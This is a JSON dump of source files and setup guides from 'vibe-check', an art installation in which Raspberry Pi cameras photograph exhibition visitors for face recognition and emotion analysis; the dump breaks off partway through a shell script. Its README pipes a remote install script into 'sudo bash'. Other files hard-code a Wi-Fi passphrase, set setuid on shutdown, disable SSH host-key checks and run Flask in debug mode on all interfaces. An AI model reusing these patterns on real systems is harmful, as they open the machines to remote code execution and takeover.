[ { "alpha_fraction": 0.7034883499145508, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 27.83333396911621, "blob_id": "489ff9e74e2316955412d888a0e83157bd639c73", "content_id": "cd472e70b7c4dee83cd59634ce5b99a02475cdfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 172, "license_type": "no_license", "max_line_length": 68, "num_lines": 6, "path": "/automate/status", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfor service in face app cluster; do\n SYSTEMD_COLORS=1 systemctl status vibe-check-$service | head -n3\n journalctl -eu vibe-check-$service | tail -n3\ndone" }, { "alpha_fraction": 0.5161290168762207, "alphanum_fraction": 0.6129032373428345, "avg_line_length": 31, "blob_id": "3f9d0f9d610ad4d097eccb822d2da96442a37e69", "content_id": "cb0454a35cc57c230798bb8a86880fe132739176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 31, "license_type": "no_license", "max_line_length": 31, "num_lines": 1, "path": "/rpi/camera/killall.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "pgrep -f $1 | xargs -n1 kill -9" }, { "alpha_fraction": 0.7204945683479309, "alphanum_fraction": 0.740726888179779, "avg_line_length": 28.340660095214844, "blob_id": "332da79625857343dea0ff726ea4f70bd62dfc8d", "content_id": "af9b27799476db3052e9688c408e299f714e65f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2669, "license_type": "no_license", "max_line_length": 263, "num_lines": 91, "path": "/rpi/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Raspberry Pi\n\n## Setup with a new computer\n\nIf you don't already have an ssh key, run `ssh-keygen`. Then run:\n\n``` \n./cameras list\n./cameras ssh-copy-id\n./cameras ping\n```\n\n## Raspberry Pi setup\n\n### SD card setup\n\n1. Download [RaspiOS Lite](https://downloads.raspberrypi.org/raspios_lite_armhf_latest) from [this page](https://www.raspberrypi.org/downloads/raspberry-pi-os/).\n2. Use [Balena Etcher](balena.io/etcher/) to burn the SD card\n3. After burning, remove and re-insert the SD card\n4. Run `touch /Volumes/boot/ssh` to enable ssh by default.\n5. Edit `/Volumes/boot/config.txt` to set `start_x=0`, `gpu_mem=300` and add `dtparam=i2c_vc=on`.\n6. Run `touch /Volumes/boot/wpa_supplicant.conf` to create the wifi settings configuration and paste the configuration below.\n7. Eject the SD card and put it in the pi.\n8. Boot the pi.\n\nOpen the wifi settings and paste:\n\n```\ncountry=US\nctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\nupdate_config=1\n\nnetwork={\n ssid=\"vibe-check\"\n psk=\"duchenne\"\n}\n```\n\n### Setting up the first Pi\n\nFirst update the firmware:\n\n```\nssh pi@<ip address>\nsudo apt update\nsudo apt full-upgrade -y\nsudo reboot now\n```\n\nThen install the dependencies:\n\n```\nssh pi@<ip address>\nsudo apt install -y wiringpi i2c-tools libopencv-dev\nsudo apt install -y python-opencv python-pip llvm iperf3\npip install llvmlite==0.31.0 numba==0.47.0 numpy requests v4l2\nsudo apt autoremove -y\nsudo apt clean\nsudo chmod u+s /sbin/shutdown\n```\n\nAnd enable the camera and I2C with `sudo raspi-config`:\n\n1. Select \"5 Interfacing Options\"\n2. Select \"P1 Camera\"\n3. Select \"Yes\"\n4. Select \"5 Interfacing Options\"\n5. Select \"P5 I2C\"\n6. Select \"Yes\"\n7. Right arrow key twice to select <Back>, enter\n8. Right arrow key twice to select <Finish>, enter\n\nDisable automatic checking for updates and automatic upgrades:\n\n```\nsudo systemctl stop apt-daily.timer\nsudo systemctl disable apt-daily.timer\nsudo systemctl disable apt-daily.service\nsudo systemctl stop apt-daily-upgrade.timer &&\\\nsudo systemctl disable apt-daily-upgrade.timer &&\\\nsudo systemctl disable apt-daily-upgrade.service &&\\\nsudo systemctl daemon-reload\n```\n\n### Setting up remaining Pis\n\nMake an image of the first pi using Disk Utility. Select \"compressed\" image type. Then use Etcher to create remaining cards.\n\nLoad each card into a pi and find the IP address. Then run `./cameras set-hostname <ip> <number>` for example `./cameras set-hostname 192.168.0.195 11`. Finally push the code to the pi with `IDS=<camera id> ./cameras update` for example `IDS=11 ./cameras update`.\n\nSome final scripts are needed to regulate the network connection, run `./cameras exec \"sudo bash camera/fix-wlan.sh\"`." }, { "alpha_fraction": 0.5749866366386414, "alphanum_fraction": 0.6336368322372437, "avg_line_length": 27.295454025268555, "blob_id": "17d74b0b4d622568ddce4135b847cbbd7c5ff620", "content_id": "ca936d34b9e1bafd06926e2e8bc6ab8e78511208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3734, "license_type": "no_license", "max_line_length": 80, "num_lines": 132, "path": "/rpi/camera/stream.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\nimport datetime\nimport sys\n\ndef log(*args):\n print(str(datetime.datetime.now()), *args)\n sys.stdout.flush()\n\nlog('loading libraries')\n\nimport json\nfrom RawProcessor import RawProcessor\nimport cv2\nimport arducam_mipicamera as arducam\nimport v4l2\nimport numpy as np\nimport requests\nfrom requests.exceptions import ConnectionError\n\nprint('loading configuration')\n\n# default configuration\nmin_exposure = 1280\nmax_exposure = 128000\nconfig = {\n 'id': 0,\n 'exposure': 12800,\n 'focus': 100,\n 'curves': [\n # [[0, 16], [127, 110], [255, 255]], # daylight\n # [[0, 17], [127, 159], [255, 255]],\n # [[0, 17], [127, 107], [255, 255]]]\n\n # [[0,0], [127,103], [255,255]], # basic white balance\n # [[0,0], [127,130], [255,255]],\n # [[0,0], [127,58], [255,255]]]\n\n [[0, 17], [127,103], [255, 197]], # exhibition\n [[0, 17], [127,130], [255, 233]],\n [[0, 17], [127,58], [255, 99]]]\n}\n\n# custom configuration overrides defaults\nwith open('config.json') as f:\n config.update(json.load(f))\n\nhost = 'hek-dual-gpu.local'\n# host = 'iyoiyo-gpu.local'\nurl = 'http://' + host + ':5000/vibecheck/upload/' + str(config['id'])\njpeg_quality = 90\nwidth, height = 4656, 3496\n\n# swap curves to bgr\nprocessor = RawProcessor(width, height, config['curves'][::-1], 'bgr')\n\nlog('connecting to camera')\ncamera = arducam.mipi_camera()\ncamera.init_camera()\n\nlog('configuring camera')\ncamera.set_resolution(width, height)\ncamera.software_auto_exposure(enable=False)\ncamera.software_auto_white_balance(enable=False)\ncamera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\ncamera.set_control(v4l2.V4L2_CID_FOCUS_ABSOLUTE, config['focus'])\n\ndef pct_overexposed(img, pts=16):\n h,w = img.shape[:2]\n overexposed = 0\n for y in np.linspace(0, h, pts, endpoint=False, dtype=int):\n for x in np.linspace(0, w, pts, endpoint=False, dtype=int):\n if np.any(img[y,x] == 255):\n overexposed += 1\n return float(overexposed) / (pts ** 2)\n\ndef modify_exposure(multiplier):\n config['exposure'] *= multiplier\n config['exposure'] = np.clip(config['exposure'], min_exposure, max_exposure)\n config['exposure'] = int(config['exposure'])\n # if multiplier > 1:\n # print('increasing exposure to', config['exposure'])\n # else:\n # print('decreasing exposure to', config['exposure'])\n camera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\n\ndef capture_and_send():\n\n # uncomment to update in realtime\n\n # with open('config.json') as f:\n # config.update(json.load(f))\n # camera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\n # camera.set_control(v4l2.V4L2_CID_FOCUS_ABSOLUTE, config['focus'])\n\n # capture image\n frame = camera.capture(encoding='raw')\n\n # process image\n img = processor(frame.as_array)\n\n # get exposure advice and autoexpose\n overexposed = pct_overexposed(img)\n # print('overexposed', overexposed)\n if overexposed > 0.02:\n modify_exposure(0.99)\n if overexposed == 0:\n modify_exposure(1.01)\n\n # convert to jpeg\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), jpeg_quality]\n _, encimg = cv2.imencode('.jpg', img, encode_param)\n\n # upload to server\n data = encimg.tostring()\n headers = {'content-type': 'image/jpeg'}\n try:\n requests.post(url, data=data, headers=headers)\n mb = float(len(data)) / (1000 * 1000)\n log('sent', round(mb, 2), 'MB')\n except ConnectionError:\n log('connection error')\n\nlog('capturing')\nwhile True:\n try:\n capture_and_send()\n except KeyboardInterrupt:\n break\n\nlog('exiting')\ncamera.close_camera()" }, { "alpha_fraction": 0.5930232405662537, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 20.625, "blob_id": "041e890fd87bc947f2c796e618a321baf4648662", "content_id": "12e337dd40b7609d2e31aa7143d3cae9d3e01fdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 172, "license_type": "no_license", "max_line_length": 55, "num_lines": 8, "path": "/automate/screenshot.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "mkdir -p screenshot\ncd screenshot\n{\n DISPLAY=:0.0 scrot 0.jpg -t 50 &\n DISPLAY=:0.1 scrot 1.jpg -t 50 &\n}\nwait\nmontage -geometry +0+0 0-thumb.jpg 1-thumb.jpg both.jpg" }, { "alpha_fraction": 0.7634146213531494, "alphanum_fraction": 0.787804901599884, "avg_line_length": 40.099998474121094, "blob_id": "622f0aaddf40cf2db0f09e12fee0681ceba14def", "content_id": "76e0ae0bfab67bb41bb125decf80c8b82c411cb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 410, "license_type": "no_license", "max_line_length": 114, "num_lines": 10, "path": "/face/download-models.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "mkdir -p models\ncd models\n\nfor DLIB_FN in shape_predictor_5_face_landmarks dlib_face_recognition_resnet_model_v1 mmod_human_face_detector; do\n wget http://dlib.net/files/$DLIB_FN.dat.bz2\n bzip2 -d $DLIB_FN.dat.bz2\ndone\n\nwget https://storage.googleapis.com/vibe-check-installation/models/ferplus-mobilenetv2-0.830.onnx\nwget https://storage.googleapis.com/vibe-check-installation/models/ferplus_classes.txt" }, { "alpha_fraction": 0.7766714096069336, "alphanum_fraction": 0.7780938744544983, "avg_line_length": 19.114286422729492, "blob_id": "753c3919f813e326f95bef637205f40ffed1b585", "content_id": "5ef5dd01bddf7acedbfc05a5ce7f26eeeb3fe490", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 703, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/rpi/camera/setup.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# setup networking\n\n# cat >/etc/wpa_supplicant/wpa_supplicant.conf <<EOL\n# country=US\n# ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\n# update_config=1\n\n# network={\n# ssid=\"vibe-check\"\n# psk=\"duchenne\"\n# }\n# EOL\n\ncat >/lib/systemd/system/vibecheck.service <<EOL\n[Unit]\nDescription=Vibe Check Camera\nRequires=network-online.target\n\n[Service]\nWorkingDirectory=/home/pi/camera\nExecStart=/home/pi/camera/stream.py\nUser=pi\nStandardInput=null\nStandardOutput=append:/var/log/vibecheck.log\nStandardError=append:/var/log/vibecheck.err.log\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\nsystemctl daemon-reload\n\nsystemctl enable vibecheck.service\nsystemctl start vibecheck.service" }, { "alpha_fraction": 0.7268292903900146, "alphanum_fraction": 0.7268292903900146, "avg_line_length": 12.733333587646484, "blob_id": "1250e4a4a2d94fe73f1b69bca9ef057d0659cbdb", "content_id": "6804461facf9d3f8698995f11baafc8de0bc73d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/database/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Setup MongoDB\n\n## Install MongoDB\n\n```\nsudo apt update\nsudo apt install -y mongodb\nsudo systemctl status mongodb # show status\n```\n\n## Import Placeholder Data\n\n```\nmongorestore -d vibecheck vibecheck\n```" }, { "alpha_fraction": 0.7363542914390564, "alphanum_fraction": 0.7487126588821411, "avg_line_length": 34.30908966064453, "blob_id": "813e9e125c5872a620183e4e98ace51b007a4bca", "content_id": "ccb3e48d82f4c75684667b7cb2f99b06ec25b6ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3886, "license_type": "no_license", "max_line_length": 729, "num_lines": 110, "path": "/README.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Vibe Check (2020)\n### Lauren Lee McCarthy and Kyle McDonald\n\nAs tracking and surveillance solutions are proposed to guide us through the current crisis, we enact another control system through the passive observation of our neighbors. Are they a threat, or essential to retaining our feeling of humanness? We notice our heightened sense of interdependence. Vibe Check appropriates common surveillance tools including face recognition and expression analysis to catalog the emotional effect exhibition visitors have on one another. Some are identified as evoking expressions of happiness, disgust, sadness, surprise, or boredom. Upon entering the exhibition, visitors are playfully alerted to who these people are, and as they leave, they may find they’ve earned this distinction themselves.\n\nCommissioned by HeK and MU for the exhibition [Real Feelings](https://www.hek.ch/en/program/events-en/event/opening-real-feelings.html).\n\n## Preparation\n\n* Install Ubuntu 18.04\n* Install the ssh server `sudo apt install openssh-server`\n* Install curl and zerotier: `sudo apt install curl && curl -s https://install.zerotier.com | sudo bash`\n* Join the zerotier network `sudo zerotier-cli join <network id>`\n* Add the network to your local `~/.ssh/config` and run `ssh-copy-id`\n* Install the NVIDIA drivers (more info in `database/readme.md`)\n* Install [Miniconda](https://docs.conda.io/en/latest/miniconda.html) (not Anaconda)\n* Install git and checkout the repository `sudo apt install git && git clone https://github.com/lmccart/vibe-check.git`\n* Install Chrome\n\n## Setup\n\nFollow the `readme.md` in each folder:\n\n1. `database/`\n2. `app/`\n3. `face/`\n4. `automate/`\n\n## Additional configuration\n\nDisable all desktop notifications:\n\n```\ngsettings set org.gnome.desktop.notifications show-banners false\n```\n\n## Status check\n\n* CPU should be busy: run `htop` and look for CPU activity.\n* GPUs should be busy: run `nvidia-smi`\n* Services should be running: `cd automate && ./status`\n* Logs should be updating `journalctl -feu vibe-check-face`\n* Cameras should be sending data (active) `cd rpi && ./cameras status`\n\n## Start-up and shut-down\n\nInstall XBindKeys:\n\n```\nsudo apt-get install xbindkeys xbindkeys-config\nxbindkeys --defaults > /home/hek/.xbindkeysrc\nxbindkeys-config\n```\n\nAdd an action for `control+shift + q` pointing to:\n\n```\nbash /home/hek/Documents/vibe-check/automate/killall-chrome.sh\n```\n\nAnd for `control+shift + c` pointing to:\n\n```\nbash /home/hek/Documents/vibe-check/automate/open-chrome.sh\n```\n\nSet the machine to automatically reboot daily at 6am:\n\n```\nsudo crontab -e\n```\n\nAdd the following line:\n\n```\n0 6 * * * /sbin/shutdown -r +5\n```\n\nAnd then using \"Startup Application Preferences\", add the `open-chrome.sh` to run on startup.\n\n## Problems\n\n### \"System problem detected\"\n\nTo clear the crash cache run:\n\n`sudo rm /var/crash/*`\n\n### TeamViewer won't start\n\nUse x0vncserver. Run `x0vncserver -passwordfile ~/.vnc/passwd -display :0` remotely and `ssh -N -L 5901:localhost:5900 <hostname>` locally then Screen Share to `localhost:5901`.\n\n### Screens won't stay rotated\n\nTwo possibilities:\n\n1. The native Ubuntu monitor configuration in `~/.config/monitors.xml` is overriding the `/etc/X11/xorg.conf` generated by nvidia-settings. Go into the native Ubuntu \"Displays\" preferences panel and rotate the screens there.\n2. Make sure to run `nvidia-settings` from the command line using `sudo`. Otherwise the `xorg.conf` will not be saved correctly.\n\n### pip install hangs indefinitely on Ubuntu\n\nThis might be because pip is [waiting for the keyring to be unlocked](https://github.com/pypa/pip/issues/7883#issuecomment-643319919). Add this to `~/.profile`:\n\n```\nexport PYTHON_KEYRING_BACKEND=keyring.backends.null.Keyring\n```\n\n### The screens do not show images\n\nCheck the Chrome terminal with `ctrl-shift-J` (outside kiosk mode). Make sure there is a `data.json` and `images/` files.\n" }, { "alpha_fraction": 0.5490196347236633, "alphanum_fraction": 0.6601307392120361, "avg_line_length": 22.538461685180664, "blob_id": "873312c89ff07be2333610240456782c617dcfdb", "content_id": "7c6ea617083219a1605160a1084e045a90d91341", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 306, "license_type": "no_license", "max_line_length": 34, "num_lines": 13, "path": "/automate/open-chrome.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\ncd ~/Documents/vibe-check/automate\n\nkillall chrome\nDISPLAY=:0.0 ./multibrowse \\\n http://localhost:8080/2 \\\n http://localhost:8080/1 \\\n http://localhost:8080/0\nDISPLAY=:0.1 ./multibrowse \\\n http://localhost:8080/3 \\\n http://localhost:8080/5 \\\n http://localhost:8080/4\n" }, { "alpha_fraction": 0.4014423191547394, "alphanum_fraction": 0.5192307829856873, "avg_line_length": 23.5, "blob_id": "2a3f04256460741c2ace93fb689d1f99f6202734", "content_id": "a58f522da259818be70b504dd18e893a081f653b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 69, "num_lines": 34, "path": "/rpi/raw-to-jpg.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport numpy as np\nimport cv2\nfrom camera.RawProcessor import RawProcessor\n\nfor fn in sys.argv[1:]:\n base, ext = os.path.splitext(fn)\n\n if ext != '.raw':\n continue\n\n out_fn = base + '.jpg'\n\n # if os.path.exists(out_fn):\n # print('skipping', out_fn)\n # continue\n\n data = np.fromfile(fn, dtype=np.uint8)\n\n width, height = 4656, 3496\n curves = [\n [[0, 14], [127,75], [255, 156]],\n [[0, 14], [127,128], [255, 255]],\n [[0, 14], [127,86], [255, 170]]]\n # curves = [\n # [[0, 0], [128, 128], [255, 255]],\n # [[0, 0], [128, 128], [255, 255]],\n # [[0, 0], [128, 128], [255, 255]]]\n processor = RawProcessor(width, height, curves[::-1], mode='bgr')\n img = processor(data)\n\n print('saving', out_fn)\n cv2.imwrite(out_fn, img)" }, { "alpha_fraction": 0.5875421166419983, "alphanum_fraction": 0.5921717286109924, "avg_line_length": 32.47887420654297, "blob_id": "a4ac50d182c855de5afd92c5a48f3c58d4c95e3e", "content_id": "ee1920cead401dc179aae244de8f81d5efc9dc1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2376, "license_type": "no_license", "max_line_length": 101, "num_lines": 71, "path": "/face/AnalysisProcess.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import os\nimport datetime\nimport time\nimport pickle\n\nfrom FaceAnalyzer import FaceAnalyzer\nfrom pymongo import MongoClient\nfrom imutil import imwrite, imdecode\nfrom blocking import classify\n\nimage_dir = '../app/images'\nrequire_two_faces = True # when blocklist is ready\n# require_two_faces = False # when building blocklist\n\nclass AnalysisProcess():\n def __init__(self):\n self.mongo = MongoClient()\n self.analyzer = FaceAnalyzer()\n self.blocklist = {}\n if os.path.exists('blocklist.pkl'):\n with open('blocklist.pkl', 'rb') as f:\n self.blocklist = pickle.load(f)\n print('blocklist:', ' '.join(list(self.blocklist.keys())))\n\n def __call__(self, camera_id, data):\n gpu_id = os.environ['CUDA_VISIBLE_DEVICES']\n id_str = f'GPU {gpu_id} x camera {camera_id:<2}'\n\n millis = int(time.time() * 1000)\n now = datetime.datetime.now().isoformat()\n\n start_time = time.time()\n img = imdecode(data)\n decode_duration = time.time() - start_time\n\n start_time = time.time()\n raw_faces = self.analyzer(img)\n analysis_duration = time.time() - start_time\n\n print(id_str, f'{decode_duration:0.3f} {analysis_duration:0.3f}', len(raw_faces), flush=True)\n\n snapshot_fn = f'data/snapshot/{camera_id}.jpg'\n if not os.path.exists(snapshot_fn):\n os.makedirs(os.path.split(snapshot_fn)[0], exist_ok=True)\n with open(snapshot_fn, 'wb') as f:\n f.write(data)\n\n filtered_faces = []\n for face in raw_faces:\n if camera_id in self.blocklist and classify(face, self.blocklist[camera_id]):\n continue\n filtered_faces.append(face)\n\n if require_two_faces and len(filtered_faces) < 2:\n return\n\n print(id_str, 'using', len(filtered_faces), 'of', len(raw_faces), 'faces')\n\n fn = os.path.join(camera_id, str(millis) + '.jpg')\n os.makedirs(os.path.join(image_dir, camera_id), exist_ok=True)\n print(id_str, 'saving to', fn, flush=True)\n full_path = os.path.join(image_dir, fn)\n with open(full_path, 'wb') as f:\n f.write(data)\n\n record = {\n 'camera_id': camera_id,\n 'photo_path': fn,\n 'faces': filtered_faces\n }\n self.mongo.vibecheck.raw.insert_one(record)" }, { "alpha_fraction": 0.6311787366867065, "alphanum_fraction": 0.6349809765815735, "avg_line_length": 22.024999618530273, "blob_id": "251af073287f65a7145c64ea7c42a6b75d58448c", "content_id": "67d76b64a1ff63a1f0f16b70a5392b59348c9b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1841, "license_type": "no_license", "max_line_length": 61, "num_lines": 80, "path": "/face/app.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from multiprocessing import Process\nfrom multiprocessing.managers import BaseManager\nfrom queue import Queue, Full\nimport time\nimport os\nimport sys\nimport traceback\n\nfrom flask import Flask, request, jsonify\nimport logging\n\nclass MyManager(BaseManager):\n pass\n\nclass Tracker():\n def __init__(self):\n self.running = True\n\n def is_running(self):\n return self.running\n\n def stop(self):\n self.running = False\n\nMyManager.register('Queue', Queue)\nMyManager.register('Tracker', Tracker)\n\nmanager = MyManager()\nmanager.start()\nqueue = manager.Queue(maxsize=16)\ntracker = manager.Tracker()\n\ndef run(gpu_id, queue, tracker):\n os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)\n from AnalysisProcess import AnalysisProcess\n analyzer = AnalysisProcess()\n while tracker.is_running():\n try:\n analyzer(*queue.get())\n except KeyboardInterrupt as e:\n print('GPU', gpu_id, 'clean exit')\n exit()\n except Exception as e:\n with open(f'gpu_{gpu_id}.err.log', 'w') as f:\n traceback.print_exc(file=f)\n print('GPU', gpu_id, 'exception', e)\n traceback.print_exc()\n print('')\n sys.stdout.flush()\n\nprocesses = []\n\ngpu_count = 2\nfor gpu_id in range(gpu_count):\n p = Process(target=run, args=[gpu_id, queue, tracker])\n p.start()\n processes.append(p)\n\napp = Flask(__name__)\nlog = logging.getLogger('werkzeug')\nlog.disabled = True\n\[email protected]('/vibecheck/upload/<camera_id>', methods=['POST'])\ndef upload(camera_id):\n try:\n data = request.get_data()\n queue.put_nowait((camera_id, data))\n except Full:\n pass\n return jsonify(success=True)\n\ntry:\n app.run(host='0.0.0.0', debug=True)\nexcept:\n pass\n\ntracker.stop()\nfor p in processes:\n p.join()\nmanager.shutdown()" }, { "alpha_fraction": 0.6378676295280457, "alphanum_fraction": 0.6525735259056091, "avg_line_length": 26.200000762939453, "blob_id": "fea706fc9d11691ab98078b84bef0e41e547333e", "content_id": "0cdcada18ba55581611f7be836fed1943cf34f28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 544, "license_type": "no_license", "max_line_length": 79, "num_lines": 20, "path": "/app/app.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, jsonify, send_from_directory\n\napp = Flask(__name__)\n\[email protected]('/images/<camera_id>/<image>')\ndef send_image(camera_id, image):\n try:\n return send_from_directory(f'images/{camera_id}', image)\n except:\n return send_from_directory(f'edited/{camera_id}', image)\n\[email protected]('/<id>')\ndef home_page(id):\n if id == 'all':\n return render_template('all.html')\n else:\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, port=8080)\n" }, { "alpha_fraction": 0.6241829991340637, "alphanum_fraction": 0.673202633857727, "avg_line_length": 37.3125, "blob_id": "17d27ba78f8b1b1941ab24135036c1d2fbfe2683", "content_id": "749851d093eb7bc52c67801c312eb1c97fbfd6da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "no_license", "max_line_length": 75, "num_lines": 16, "path": "/face/blocking.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef face_to_features(face):\n shape = np.asarray(face['shape']).astype(float)\n descriptor = np.asarray(face['descriptor']).astype(float)\n # 1/320 is approximately (128/10)/4096\n # 128 = len(descriptor), 10 = len(shape), 4096 = max(shape)\n position_weight = 1/320\n features = np.hstack((shape.reshape(-1) * position_weight, descriptor))\n return features\n \ndef classify(face, blocklist, threshold=8):\n features = face_to_features(face)\n distances = np.sqrt((features - np.asarray(blocklist)) ** 2).sum(1)\n closest = distances.min()\n return closest < threshold" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.75, "avg_line_length": 29.5, "blob_id": "fcb26170934b99641902096fa9654af74f246223", "content_id": "f9f6b7b3dfc1562b1fcd9d88c6b82e976a997fbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "no_license", "max_line_length": 50, "num_lines": 2, "path": "/app/run.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/sh\n~/miniconda3/envs/vibe-check-app/bin/python app.py" }, { "alpha_fraction": 0.6709844470024109, "alphanum_fraction": 0.681347131729126, "avg_line_length": 23.1875, "blob_id": "b628c0aebaa48353867d8d942ae8edca54e2f6df", "content_id": "54041b690d0021636e13dbc49c72e90bf883aa11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 61, "num_lines": 16, "path": "/face/single.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\n\nfrom AnalysisProcess import AnalysisProcess\n\napp = Flask(__name__)\n\nanalyzer = AnalysisProcess()\n\[email protected]('/vibecheck/upload/<camera_id>', methods=['POST'])\ndef upload(camera_id):\n data = request.get_data()\n analyzer(camera_id, data)\n return jsonify(success=True)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)" }, { "alpha_fraction": 0.5453222393989563, "alphanum_fraction": 0.5553014278411865, "avg_line_length": 22.34951400756836, "blob_id": "051de22d5c811337dc66ccf7e019fcc2c16338c4", "content_id": "ab68fe28d391cba4163afee5dae157b9d36df429", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4810, "license_type": "no_license", "max_line_length": 95, "num_lines": 206, "path": "/rpi/cameras", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash -m\n\nsource camera-functions.sh\n\nfunction usage() {\n cat << EOF\n./$SCRIPT\n\n Control all the cameras. Define IDS to control a subset.\n\n help: print this message\n list: list all the camera ids and addresses\n set-hostname <ip> <id>: setup hostname and SSH at <ip> as camera <id>\n ssh-copy-id: copy SSH key from this machine to each camera\n ping: check connection to all cameras (uses SSH)\n exec: execute command via ssh on all cameras\n ssh <id>: helper to ssh into specific camera\n download <path>: download directory from each camera\n status: display info and recent logfile for all cameras\n shutdown: shutdown all cameras\n reboot: reboot all cameras\n update: rsync code and install arducam library on all cameras\n start/stop/restart/enable/disable: systemctl * vibecheck\nEOF\n exit\n}\n\nif [ $# -eq 0 ]; then\n usage\nfi\n\n# these are cases that do not require IDs\ncase \"$1\" in\nhelp)\n usage\n;;\nlist)\n for ID in $IDS; do\n ADDRESS=`get_address $ID`\n AT=`get_at $ID`\n echo $ID $ADDRESS\n done\n exit\nesac\n\nif [ ! -e \"$SSH_FILE\" ]; then\n echo \"Couldn't find $SSH_FILE\"\n echo \"Try running ssh-keygen first\"\n exit\nfi\n\n# these are cases that operate on a specific device\ncase \"$1\" in\nset-hostname)\n if [ \"$#\" -ne 3 ]; then\n echo \"Example: ./$SCRIPT set-hostname 192.168.0.150 0\"\n usage\n fi\n\n IP=$2\n ID=$3\n AT=pi@$IP\n ssh-copy-id -i $SSH_FILE $AT\n HOSTNAME=$HOSTNAME_PREFIX$ID\n # it takes four separate commands to fully set the hostname\n # \"sudo: unable to resolve host...\" is not an error, just intermediate\n # final command restarts the mdns server\n ssh $AT \"sudo sed -i \\\"s/0\\.1\\.1.*/0.1.1\\t$HOSTNAME/g\\\" /etc/hosts &&\\\n sudo hostnamectl set-hostname $HOSTNAME &&\\\n sudo hostname $HOSTNAME &&\\\n echo $HOSTNAME | sudo tee /etc/hostname &&\\\n sudo systemctl restart avahi-daemon\"\n exit\n;;\nssh)\n ID=$2\n AT=`get_at $ID`\n ssh $AT\n exit\n;;\nesac\n\n# checking command validity\ncase \"$1\" in\n ping) ;;\n exec) ;;\n shutdown) ;;\n reboot) ;;\n update) ;;\n status) ;;\n pingtime) ;;\n enable) ;;\n disable) ;;\n start) ;;\n stop) ;;\n restart) ;;\n ssh-copy-id) ;;\n download) ;;\n *)\n echo \"Invalid command\"\n usage\n ;;\nesac\n\n# sequential commands\nfor ID in $IDS; do\n AT=`get_at $ID`\n case \"$1\" in\n ssh-copy-id)\n ssh-copy-id -i $SSH_FILE $AT\n ;;\n esac\ndone\n\n# parallel commands\nfor ID in $IDS; do\n{\n ADDRESS=$HOSTNAME_PREFIX$ID$HOSTNAME_SUFFIX\n AT=pi@$ADDRESS\n PREFIX=`printf \"%2s\" $ID`\n \n # check if the device is online before continuing\n ssh -q \\\n -o BatchMode=yes \\\n -o StrictHostKeyChecking=no \\\n -o ConnectTimeout=1 \\\n $AT \\\n 'exit 0'\n if [ $? -ne 0 ]\n then\n ping -W1 -c1 $ADDRESS &> /dev/null\n if [ $? -ne 0 ]\n then\n echo \"$PREFIX down\"\n else\n echo \"$PREFIX up, cannot ssh\"\n fi\n continue\n fi\n\n case \"$1\" in\n 